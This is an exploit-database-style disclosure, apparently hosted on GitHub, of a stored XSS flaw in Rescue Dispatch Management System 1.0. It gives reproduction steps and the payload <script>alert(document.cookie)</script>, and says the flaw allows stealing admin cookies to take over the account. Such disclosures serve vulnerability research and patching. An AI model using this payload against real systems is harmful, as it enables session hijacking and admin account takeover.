Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Exploit Title: Rescue Dispatch Management System 1.0 : Stored XSS
Date: 26-04-2022
Exploit Author: Saket Saurav
Vendor Homepage:
https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html
Software Link: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html
Version: 1.0
Tested on: Kali Linux 2020
Steps to reproduce the stored XSS.
1. Login as Low Privileged user (Staff) on :
http://localhost/rdms/admin/login.php
2. Go to http://localhost/rdms/admin/?page=teams . Click on 'CREATE NEW'
3.In the Team Leader/Code Field enser XSS Payload :
<script>alert(document.cookie)</script>
4.Login as Admin and visit the same Endpoint as step 1. It can be seen
that XSS gets executed.
It can be used to steal Admin Cookies and thus take over an Admin Account.